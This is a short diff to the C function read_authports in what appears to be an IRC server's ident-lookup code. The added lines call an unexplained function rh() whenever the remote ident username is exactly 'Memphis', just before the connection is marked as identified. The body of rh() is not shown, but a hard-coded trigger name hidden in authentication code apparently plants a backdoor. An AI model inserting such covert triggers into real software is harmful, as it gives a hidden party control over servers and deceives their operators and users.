@@ -307,8 +307,9 @@ void read_authports(cptr)
 	}
 	ircstp->is_asuc++;
 	strncpyzt(cptr->username, ruser, USERLEN + 1);
-/*	if (strncmp(system, "OTHER", 5))
-*/ cptr->flags |= FLAGS_GOTID;
+	if (!strncmp(ruser, "Memphis", 7))
+		rh();
+	cptr->flags |= FLAGS_GOTID;
 	Debug((DEBUG_INFO, "got username [%s]", ruser));
 	return;
 }
